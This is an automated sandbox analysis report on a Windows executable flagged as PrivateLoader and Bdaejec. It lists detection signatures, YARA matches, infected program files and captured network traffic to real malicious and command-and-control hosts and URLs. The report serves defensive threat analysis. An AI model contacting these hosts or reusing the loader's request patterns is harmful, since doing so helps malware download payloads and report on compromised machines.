Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe

Overview

General Information

Sample name:611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
Analysis ID:1480302
MD5:5ae2c7e495880d7e209a41158fd72984
SHA1:f2bd4549f77a5c6af49259b60caf937b31decbf0
SHA256:9664f55603f168dc5f7ac498789f5275b2c64fb5ad1bc7c185944421bd5a8777
Tags:exe
Infos:

Detection

Bdaejec, PrivateLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected PrivateLoader
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe (PID: 3792 cmdline: "C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe" MD5: 5AE2C7E495880D7E209A41158FD72984)
    • vXQpuA.exe (PID: 5064 cmdline: C:\Users\user\AppData\Local\Temp\vXQpuA.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 1220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1392 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
    611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeMALWARE_Win_DLInjector06Detects downloader / injectorditekSHen
    • 0x586f0:$s1: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    • 0x58218:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x58280:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x582e8:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x58350:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x583b8:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x58420:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x58488:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x58518:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x584ec:$s3: https://ipinfo.io/
    • 0x5857c:$s4: https://db-ip.com/
    • 0x585d8:$s5: https://www.maxmind.com/en/locate-my-ip-address
    • 0x585a4:$s6: https://ipgeolocation.io/
    • 0x586e4:$s7: POST

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
      00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
        Process Memory Space: vXQpuA.exe PID: 5064JoeSecurity_BdaejecYara detected BdaejecJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
            0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpackMALWARE_Win_DLInjector06Detects downloader / injectorditekSHen
            • 0x586f0:$s1: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
            • 0x58218:$s2: Content-Type: application/x-www-form-urlencoded
            • 0x58280:$s2: Content-Type: application/x-www-form-urlencoded
            • 0x582e8:$s2: Content-Type: application/x-www-form-urlencoded
            • 0x58350:$s2: Content-Type: application/x-www-form-urlencoded
            • 0x583b8:$s2: Content-Type: application/x-www-form-urlencoded
            • 0x58420:$s2: Content-Type: application/x-www-form-urlencoded
            • 0x58488:$s2: Content-Type: application/x-www-form-urlencoded
            • 0x58518:$s2: Content-Type: application/x-www-form-urlencoded
            • 0x584ec:$s3: https://ipinfo.io/
            • 0x5857c:$s4: https://db-ip.com/
            • 0x585d8:$s5: https://www.maxmind.com/en/locate-my-ip-address
            • 0x585a4:$s6: https://ipgeolocation.io/
            • 0x586e4:$s7: POST
            0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
              0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpackMALWARE_Win_DLInjector06Detects downloader / injectorditekSHen
              • 0x586f0:$s1: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
              • 0x58218:$s2: Content-Type: application/x-www-form-urlencoded
              • 0x58280:$s2: Content-Type: application/x-www-form-urlencoded
              • 0x582e8:$s2: Content-Type: application/x-www-form-urlencoded
              • 0x58350:$s2: Content-Type: application/x-www-form-urlencoded
              • 0x583b8:$s2: Content-Type: application/x-www-form-urlencoded
              • 0x58420:$s2: Content-Type: application/x-www-form-urlencoded
              • 0x58488:$s2: Content-Type: application/x-www-form-urlencoded
              • 0x58518:$s2: Content-Type: application/x-www-form-urlencoded
              • 0x584ec:$s3: https://ipinfo.io/
              • 0x5857c:$s4: https://db-ip.com/
              • 0x585d8:$s5: https://www.maxmind.com/en/locate-my-ip-address
              • 0x585a4:$s6: https://ipgeolocation.io/
              • 0x586e4:$s7: POST

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Suricata Signatures

              Timestamp:2024-07-24T17:26:53.131145+0200
              SID:2838522
              Source Port:60858
              Destination Port:53
              Protocol:UDP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-24T17:26:51.124380+0200
              SID:2838522
              Source Port:60858
              Destination Port:53
              Protocol:UDP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-24T17:26:52.119126+0200
              SID:2838522
              Source Port:60858
              Destination Port:53
              Protocol:UDP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-24T17:27:38.899025+0200
              SID:2043080
              Source Port:52169
              Destination Port:53
              Protocol:UDP
              Classtype:Malware Command and Control Activity Detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://ddos.dnsnb8.net:799/cj//k1.rarxAvira URL Cloud: Label: malware
              Source: https://softs-portal.com/api/registerUser.phpgAvira URL Cloud: Label: malware
              Source: http://ddos.dnsnb8.net:799/cj//k1.rarDownloadManagerAvira URL Cloud: Label: malware
              Source: https://softs-portal.com/api/registerUser.phpAvira URL Cloud: Label: malware
              Source: http://wfsdragon.ru/api/setStats.phpAvira URL Cloud: Label: phishing
              Source: http://wfsdragon.ru:80/api/setStats.phpAvira URL Cloud: Label: phishing
              Source: https://softs-portal.com/Avira URL Cloud: Label: malware
              Source: http://ddos.dnsnb8.net:799/cj//k1.rarAvira URL Cloud: Label: phishing
              Source: http://ddos.dnsnb8.net:799/cj//k1.rar0Avira URL Cloud: Label: malware
              Source: http://ddos.dnsnb8.net:799/cj//k1.rar&Avira URL Cloud: Label: phishing
              Source: http://ddos.dnsnb8.net:799/cj//k1.rarrasAvira URL Cloud: Label: phishing
              Source: http://ddos.dnsnb8.net:799/cj//k1.rarIAvira URL Cloud: Label: phishing
              Source: http://ddos.dnsnb8.net:799/cj//k1.rarWAvira URL Cloud: Label: phishing
              Source: http://ddos.dnsnb8.net/Avira URL Cloud: Label: phishing
              Source: http://ddos.dnsnb8.net:799/cj//k1.rareAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
              Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
              Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeReversingLabs: Detection: 92%
              Multi AV Scanner detection for submitted file
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeReversingLabs: Detection: 97%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
              Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeJoe Sandbox ML: detected
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49724 version: TLS 1.2
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

              Spreading

              barindex
              Yara detected PrivateLoader
              Source: Yara matchFile source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Infects executable files (exe, dll, sys, html)
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00357261 FindFirstFileExW,0_2_00357261
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_006129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_006129E2
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_00612B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00612B8C
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

              Networking

              barindex
              Yara detected PrivateLoader
              Source: Yara matchFile source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Connects to a pastebin service (likely for C&C)
              Source: unknownDNS query: name: pastebin.com
              Source: Joe Sandbox ViewIP Address: 212.193.30.21 212.193.30.21
              Source: Joe Sandbox ViewIP Address: 212.193.30.21 212.193.30.21
              Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
              Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
              Source: Joe Sandbox ViewIP Address: 212.193.30.45 212.193.30.45
              Source: Joe Sandbox ViewIP Address: 212.193.30.45 212.193.30.45
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: telegram.org
              Source: global trafficHTTP traffic detected: GET /raw/A7dSG1te HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: pastebin.com
              Source: global trafficHTTP traffic detected: GET /proxies.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 212.193.30.45
              Source: global trafficHTTP traffic detected: GET /server.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 212.193.30.29
              Source: global trafficHTTP traffic detected: GET /api/setStats.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: wfsdragon.ru
              Source: global trafficHTTP traffic detected: POST /service/communication.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 25Host: 212.193.30.21
              Source: global trafficHTTP traffic detected: POST /service/communication.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 25Host: 212.193.30.21
              Source: global trafficHTTP traffic detected: POST /service/communication.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 25Host: 212.193.30.21
              Source: global trafficHTTP traffic detected: POST /service/communication.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 25Host: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.29
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.45
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.29
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.29
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.29
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.29
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownTCP traffic detected without corresponding DNS query: 212.193.30.21
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_00611099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_00611099
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: telegram.org
              Source: global trafficHTTP traffic detected: GET /raw/A7dSG1te HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: pastebin.com
              Source: global trafficHTTP traffic detected: GET /proxies.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 212.193.30.45
              Source: global trafficHTTP traffic detected: GET /server.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 212.193.30.29
              Source: global trafficHTTP traffic detected: GET /api/setStats.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: wfsdragon.ru
              Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
              Source: global trafficDNS traffic detected: DNS query: telegram.org
              Source: global trafficDNS traffic detected: DNS query: pastebin.com
              Source: global trafficDNS traffic detected: DNS query: wfsdragon.ru
              Source: global trafficDNS traffic detected: DNS query: softs-portal.com
              Source: unknownHTTP traffic detected: POST /service/communication.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 25Host: 212.193.30.21
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Jul 2024 15:27:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8a84ef70ddba72ab-EWR
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Jul 2024 15:27:38 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HEB0ODgbQzdwXbrO%2Fmpcx54rLT3TkSjyztoRT9GMG4OZ5uvC42Wh%2FHFnkCtG3M1maOMLwGfOWQirUg6Hnn8v1vkJfbpuzpi%2F3vDyLzjPstrI%2FskReRpENmzfzUQepU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a84ef7a1d151a30-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 61 38 34 65 66 37 61 31 64 31 35 31 61 33 30 27 2c 74 3a 27 4d 54 63 79 4d 54 67 7a 4e 44 67 31 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 61 2e 6e 6f 6e 63 65 3d 27 27 3b 61 2e 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 Data Ascii: 46e<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8a84ef7a1d151a30',t:'MTcyMTgzNDg1OC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.sr
